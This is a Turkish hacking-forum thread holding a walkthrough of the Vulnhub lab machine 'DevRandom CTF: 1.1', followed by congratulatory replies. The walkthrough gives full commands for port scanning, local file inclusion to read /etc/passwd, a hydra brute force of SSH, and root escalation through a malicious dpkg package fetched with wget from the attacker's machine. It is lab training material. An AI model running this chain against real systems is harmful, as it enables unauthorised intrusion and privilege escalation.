THT DUYURU

 
 
Capture The Flag Vulnerable VM Walkthrough & Capture The Flag (CTF) Writeup Yazabileceğiniz Bölüm

Seçenekler

DevRandom CTF:1.1 Vulnhub Çözümü

P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
8
1225
18-07-2020 15:40
#1
Merhabalar herkese, bu sayımızda sizlerle birlikte Vulnhub’ta bulunan DevRandom CTF: 1.1 isimli makineyi çözeceğiz. Lafı uzatmadan makine hakkında bilgileri verelim ardından makinenin çözümüne geçelim.

Makine Adı: DevRandom CTF: 1.1
Seri İsmi: DevRandom CTF
Makine Yayınlanma Tarihi: 27 Mart 2020
Makineyi Oluşturan: Hunri Beats





Bu kadar bilgi yeter bence, haydi makinenin çözümüne geçelim.

Öncelikle zafiyetli makinemizin IP adresini öğrenelim. Bunun için terminali açarak
Kod:
sudo netdiscover
yazalım. Bizlere ağımızda bulunan cihazların IP adreslerini ve MAC adreslerini listeledi.



IP adresimizi aldık sırada port taraması yapmaya geldi. Zafiyetli makinenin portlarını tarayarak bir açık bulmaya çalışalım. Terminale
Kod:
nmap -A -p- 192.168.1.142
yazarak makine hakkında bilgi alalım.



SSH ve HTTP portları açık olduğunu gördük. 80 portunun açık olmasından bir web sayfasının ayakta olduğunu anlayabiliriz. Tarayıcımızı açarak 192.168.1.142 yazalım.



Resimdeki gibi bir site karşıladı bizleri. Kaynak kodlarına baktım ancak bir veri elde edemedim. Ardından dizin taraması yapmak için dirb aracını açtım. Terminale gelerek
Kod:
dirb http://192.168.1.142
yazalım.



Burada dikkatimi çeken yer "robots.txt" kısmı oldu. Tarayıcıya tekrar gelerek
Kod:
http://192.168.1.142/robots.txt
yazalım. Dizinlere baktım fakat bir şey bulamadım. En son çare olarak ?include=info dizinine gitmeye karar verdim.



Yeni bir sayfa açıldı ve biraz bekledikten sonra bir sayfa çağırdığını gördüm. Buradan LFI(Local File Inclusion) açığı olabileceğini düşündüm ki ?include da düşüncemi güçlendirdi.

Genel olarak bu tür açıklarda "../../../etc/passwd" şeklinde gidilerek bilgiler alınır. Burada ki amaç: "../" ile bir önceki dizine geçiş yapmaktır. Ne kadar yapacağınız belli olmaz yani spesifik bir sayısı yoktur. Makineden makineye değişim göstermektedir. Bu makinede dokuz tane yaptığımızda bilgilere erişebildik.



"trevor" isimli bir kullanıcı adını yakaladım. Bu veriyi SSH bağlantısında kullanacağım ancak şifre elimizde yok. Bu yüzden kaba kuvvet saldırısı yapacağız.

Terminali tekrar açalım ve
Kod:
hydra -l trevor -P /home/can/Desktop/rockyou.txt 192.168.1.142 ssh
yazalım. Buradaki kod yapısındaki amaç hydra isimli aracı ile 192.168.1.142 IP adresli makinenin SSH portuna trevor isimli kullanıcı adı ile şifre denemesi yapmaktır.



Şifreyi bulduk şifremiz: qwertyuiop[]

SSH ile makineye bağlanmak için terminali tekrar açalım ve yazalım. Bizlerden şifre istediğinde "qwertyuiop[]" yazalım. Gördüğünüz gibi makineye başarılı bir şekilde giriş yaptık.



Karşı makineye girdik ancak yetkimiz sınırlı. Yetki yükseltme işlemi yapmamız gerekiyor ve aklıma dpkg ile zararlı bir paket yüklemek geldi. İnternette biraz araştırma yaparak https://gtfobins.github.io/gtfobins/dpkg/ zararlının nasıl oluşturulup kullanılacağını buldum. Kendi makineme gelerek terminale
Kod:
TF=$(mktemp -d)
yazdıktan sonra
Kod:
echo 'exec /bin/sh' > $TF/x.sh
ve dosyayı oluşturmak için
Kod:
fpm -n x -s dir -t deb -a all --before-install $TF/x.sh $TF
yazdım.

Resimde de gördüğünüz gibi dosyamız oluştu. Şimdi Python Server'ı açarak zafiyetli makineden bunu çekeceğim. Python Server'ı açmak için
Kod:
python -m SimpleHTTPServer
yazıyorum.



Zafiyetli makinede kendi makinemden yetki sorunu çekmeden çekebileceğim tek yer "/tmp" dizini. Onun için "/tmp" dizinine geçmek için l
Kod:
s /tmp
yazdım. Ardından dosyayı almak için
Kod:
wget http://192.168.1.54:8000/x_1.0_all.deb
yazdım ve dosyayı başarılı bir şekilde çektim.

Zararlıyı çalıştırmak için ise:
Kod:
sudo dpkg -i x_1.0_all.deb
yazdım. Zararlımız çalıştı "id" değerimize baktığımızda "root" yetkisinde olduğumuzu gördük. Root dizinine giderek flag dosyamızı aldım.




---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Konu 'Adige tarafından (20-08-2020 01:31 Saat 01:31 ) değiştirilmiştir.
'Adige - ait Kullanıcı Resmi (Avatar)
Ar-Ge Tim Lideri
Üyelik tarihi:
10/2012
Nereden:
Secure Shell
Yaş:
27
Mesajlar:
9.229
Konular:
572
Teşekkür (Etti):
814
Teşekkür (Aldı):
1987
Ticaret:
(0) %
20-08-2020 01:31
#2
Emeğinize sağlık
---------------------
"Kendinizi geliştirmeye o kadar çok zaman harcayın ki Başkalarının yaptıklarıyla ilgilenmeye ve onları eleştirmeye vaktiniz olmasın"



Xowly - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
06/2019
Nereden:
ғate
Mesajlar:
725
Konular:
72
Ticaret:
(0) %
20-08-2020 01:33
#3
Elinize sağlık hocam
x4807 - ait Kullanıcı Resmi (Avatar)
Analizci
Üyelik tarihi:
08/2019
Nereden:
\x20
Mesajlar:
955
Konular:
111
Ticaret:
(0) %
20-08-2020 01:34
#4
Elinize sağlık hocam, güzel olmuş.
--------------------- systemctl poweroff
SkyRexun - ait Kullanıcı Resmi (Avatar)
Hesap Askıya Alındı
Üyelik tarihi:
06/2020
Nereden:
UnderCover
Mesajlar:
592
Konular:
172
Teşekkür (Etti):
129
Teşekkür (Aldı):
271
Ticaret:
(0) %
20-08-2020 01:50
#5
Elinize sağlık hocam
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
21-08-2020 15:24
#6
Alıntı:
'Adige´isimli üyeden Alıntı Mesajı göster
Emeğinize sağlık
Alıntı:
Xowly´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam
Alıntı:
"aqua´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam, güzel olmuş.
Alıntı:
SkyRexun´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam
Sağ olun arkadaşlar
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
XCodeExpertX - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
05/2020
Nereden:
Malatya
Yaş:
18
Mesajlar:
145
Konular:
36
Teşekkür (Etti):
120
Teşekkür (Aldı):
45
Ticaret:
(0) %
21-08-2020 15:25
#7
Elinize emeğinize sağlık.
Profesör - ait Kullanıcı Resmi (Avatar)
Moderatör
Üyelik tarihi:
04/2020
Nereden:
-Türkistan-
Mesajlar:
3.932
Konular:
208
Teşekkür (Etti):
775
Teşekkür (Aldı):
2293
Ticaret:
(0) %
21-08-2020 15:56
#8
Elinize sağlık hocam VALLAHI ayakta alkışlarım
---------------------
İletişim için
Twitter: PROFESOR_THT
E-posta: [email protected]
Telegram: thtprof

SELAM SANA
EY YILLARI HEBA OLAN GENÇ!

Konu P4RS tarafından (21-08-2020 16:23 Saat 16:23 ) değiştirilmiştir.
P4RS - ait Kullanıcı Resmi (Avatar)
Özel Üye
Üyelik tarihi:
01/2017
Nereden:
Ankara
Mesajlar:
5.139
Konular:
626
Teşekkür (Etti):
1779
Teşekkür (Aldı):
3708
Ticaret:
(0) %
23-08-2020 17:14
#9
Alıntı:
XCodeExpertX´isimli üyeden Alıntı Mesajı göster
Elinize emeğinize sağlık.
Alıntı:
profes0r´isimli üyeden Alıntı Mesajı göster
Elinize sağlık hocam VALLAHI ayakta alkışlarım
Eyvallah arkadaşlar sağ olun
---------------------


𝖘𝖊𝖞𝖈𝖎𝖑𝖊𝖗
Profesör Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler